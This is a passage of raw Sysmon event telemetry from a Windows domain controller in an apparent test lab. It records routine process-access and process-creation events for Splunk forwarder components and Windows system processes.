10341000x800000000000000014389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.021{08A6967A-4A76-6000-9805-000000009A01}35363604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.944{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AAF-6000-9B05-000000009A01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.944{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.944{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.944{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.944{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.944{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4AAF-6000-9B05-000000009A01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.944{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AAF-6000-9B05-000000009A01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.945{08A6967A-4AAF-6000-9B05-000000009A01}2132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.273{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AAF-6000-9A05-000000009A01}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.273{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.273{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.273{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.273{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.273{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4AAF-6000-9A05-000000009A01}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.273{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AAF-6000-9A05-000000009A01}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:15.273{08A6967A-4AAF-6000-9A05-000000009A01}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.538{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AB0-6000-9C05-000000009A01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.538{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.538{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.538{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.538{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.538{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4AB0-6000-9C05-000000009A01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.538{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AB0-6000-9C05-000000009A01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.540{08A6967A-4AB0-6000-9C05-000000009A01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:16.101{08A6967A-4AAF-6000-9B05-000000009A01}21324824C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.679{08A6967A-4AB1-6000-9D05-000000009A01}69686976C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.523{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AB1-6000-9D05-000000009A01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.523{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W